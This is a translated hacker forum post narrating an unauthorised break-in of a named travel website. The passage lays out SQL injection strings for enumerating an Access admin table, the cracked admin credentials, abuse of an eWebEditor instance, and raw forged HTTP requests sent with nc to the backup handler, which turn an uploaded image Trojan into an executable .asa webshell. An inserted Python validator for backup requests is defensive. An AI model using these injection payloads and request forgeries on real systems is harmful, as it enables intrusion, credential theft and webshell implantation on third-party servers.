This is an article I wrote earlier on the Green Corps forum. It was originally written by me; I learned from a t00ls article and made improvements. My account name on Green Corps is also leisureforest.
There is no doubt about its authenticity. Thanks.
Database packet capture alternative backup
Address: http://www.bkjia.com/ (used only to replace the target website, not this site)

It is also a travel site. I had just published an article about leaving; it was raining outside and I was really idle, so I wrote this article to boost my popularity a bit.
This address was sent to me by a guy who told me to give it a try. I found the link http://www.kmholiday.com/Travel/Travel_line_view.asp?Lineid=1030 and appended a single quote (') to it; an error message was returned immediately:

Microsoft JET Database Engine
Error '80040e14'
Syntax error (missing operator) in query expression 'id = 1030'.
/Travel/Travel_line_view.asp, line 41
What does this mean? It is not yet clear, so let me poke at it. It is an Access database, so I go straight to the statement: and exists (select * from msysobjects)

Microsoft JET Database Engine
Error '80040e09'
Records cannot be read; no read permission on 'msysobjects'.
/Travel/Travel_line_view.asp, line 41
The table exists but cannot be read. OK. Then and exists (select * from admin) returns the normal page, so there is an admin table. Handsome.
and exists (select count(user) from admin) returns the normal page, so there is a user field.
and exists (select count(psw) from admin) returns the normal page, so the password field is psw.
Username aidy, password 28B9E7A5FADBDB964E9069BC82AC2AF9, a 32-character hash, which scared me. I went to an MD5 site and got it done: 19850311. At this point I sent a message to the guy: this is too simple, what now? He said it only counts if you get a shell. Let's proceed.
Finding the back end was really difficult for me. I first ran a tool and scanned more than 40 thousand paths. Honestly, in this case he must have a directory name that is very hard to guess. What to do? Google: I tried several search statements and only found two login pages, neither of which was correct. Back to the homepage to look at the images, but right-clicking an image gave no option to view its properties. Then the address shown in Thunder during the last download gave me the answer. Haha......
From that path, I went directly to http://www.kmholiday.com/adminsheeninfo/.
I found a database backup feature. I first found an upload form and uploaded an image Trojan, and while busy backing it up I found that the original backup path could not be modified. That is to say, you can only back up the mdb database file, and the file name after backup is .asa. That itself is no problem, since IIS will parse it; the key is that the source path cannot be changed. That stumped me. What to do? Right-click to view the source. I found this link:
http://www.bkjia.com/adminsheeninfo/Oledit/ewebeditor/ Khan, an editor. Editor, oh editor, I wasn't going to bother with you. I entered the editor, and the login page had not been deleted. (It has now been deleted while I was writing this article; I know who deleted it, and it wasn't me.) Enter the username and password. Find style management; the original style's Save button has been removed, so that one is safe. Then I copied a style and added the asp and asa formats to the newly created style. But that didn't succeed. In fact it would have been enough to add aaspsp here, but I didn't expect him to have such a stupid vulnerability. Won't I get the shell? Impossible.
So I finally thought of a packet-capture Trojan. Later I saw that someone had thought of this method two years ago. I just inserted a news item, captured the packet, and changed the news content to my own one-liner.

The captured packet is as follows:
POST /adminsheeninfo/Oledit/Upload.asp?Action=remote&type=remote&style=s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh...s&style=s_light
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Maid=1312255680031; maid=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
EWebEditor_UploadText=ggggggggggg

In the end I saw that the content was captured, but the path was not.
It seemed this was really hard to do. At that point I still wanted to use the back-end backup. In fact, since the back end can be packet-captured too, let's capture it. Just do it.
I clicked the back-end database backup. The captured content is as follows:
POST /adminsheeninfo/DB_Manage.asp?Action=BackupData&act=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh...p?Action=BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Maid=1312255680031; maid=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=
We don't see this link on the page itself, so what does it mean? Let's analyze it first. DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb is the original database name: %23 is a space and %2F is the encoding of /, so after decoding it is /adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb. bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F is the folder the backup is written to, and bkDBname is the database name after backup. We want to change the original database path to the uploaded image Trojan, for example 12:07:04.jpg (I can write it at will). Change the original database path to this, then count the character length of the original database path. Suppose it is 162; I did not count it myself. As I remember, the number was 153 and the image path was 64, so the original Content-Length: 162 was changed to 153 - 64 = 89. Then save the file as qq.txt, a plain txt document, and copy it to the root of the C: drive.
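As an added defender's example (not part of the original article), the following Python applies the server-side checks the DB_Manage.asp backup handler described above should have enforced on DBpath, bkfolder and bkDBname, and runs them over the captured body (extraction spaces removed) and over a constructed body of the kind the article describes. The directory names come from the page; the function names and the rejection messages are my own assumptions.

```python
import posixpath
from urllib.parse import parse_qs

# Directories as they appear in the captured request (from the page).
DB_DIR = "/adminsheeninfo/db/"
BACKUP_DIR = "/database/DataBackup/"
# Extensions IIS hands to the ASP engine; a backup must never produce these.
EXECUTABLE_EXT = {".asp", ".asa", ".cer", ".cdx", ".aspx"}

# Captured body from the article, with the extraction spaces removed.
CAPTURED_BODY = ("DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb"
                 "&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F"
                 "&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=")
# Constructed body of the kind the article describes: DBpath repointed at an
# uploaded image, backup name left with the .asa extension.
TAMPERED_BODY = ("DBpath=%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg"
                 "&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F"
                 "&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=")

def _norm(path):
    """Treat backslashes like IIS does, then collapse ./ and ../ segments."""
    return posixpath.normpath(path.replace("\\", "/"))

def check_backup_request(body):
    """Return the reasons a backup request must be rejected (empty list = acceptable)."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    dbpath = params.get("DBpath", "")
    bkfolder = params.get("bkfolder", "")
    bkdbname = params.get("bkDBname", "")
    reasons = []
    if not dbpath.lower().endswith(".mdb"):
        reasons.append("DBpath is not an .mdb file")
    if not _norm(dbpath).startswith(DB_DIR):
        reasons.append("DBpath is outside the database directory")
    if ".." in bkfolder.replace("\\", "/").split("/"):
        reasons.append("bkfolder contains directory traversal")
    if posixpath.basename(bkdbname.replace("\\", "/")) != bkdbname:
        reasons.append("bkDBname contains a path")
    ext = posixpath.splitext(bkdbname.lower())[1]
    if ext in EXECUTABLE_EXT:
        reasons.append("bkDBname has a server-executable extension")
    elif ext != ".mdb":
        reasons.append("bkDBname is not an .mdb file")
    return reasons

def safe_backup_target(bkdbname):
    """Hardened alternative: ignore bkfolder, keep only a sanitized stem, force .mdb."""
    stem = posixpath.splitext(posixpath.basename(bkdbname.replace("\\", "/")))[0]
    stem = "".join(c for c in stem if c.isalnum() or c in "_-") or "backup"
    return BACKUP_DIR + stem + ".mdb"
```

Note that even the untampered request is rejected: the application's own choice of an .asa backup name is already the defect, and the tampered DBpath only adds to it.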
Upload it with nc (nc should also be placed in the root of the C: drive).
Command: nc www.kmholiday.com 80 < qq.txt. After the upload, a message indicating success is returned, as follows:
20172fadminsheeninfo%2foledit%2fuploadfile%2f2011730232015138.jpg 62
The database has been backed up successfully. The path of your database is \hosting\wwwroot\kmholiday_cn\htdocs\adminsheeninfo\../../database/DataBackup/\db_bak_20151130_231235.asa...
This is the ASP Trojan address after the backup: D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsheeninfo\../../database/DataBackup/\db_bak_20151130_231235.asa. It can be connected with the Trojan's client, and then you upload your own ASP shell for access. I'll say no more; that wouldn't be good for you.
Well, it seems simple things are not so easy to get. It's better to do things in a down-to-earth manner, like me.
By 9149727@qq.com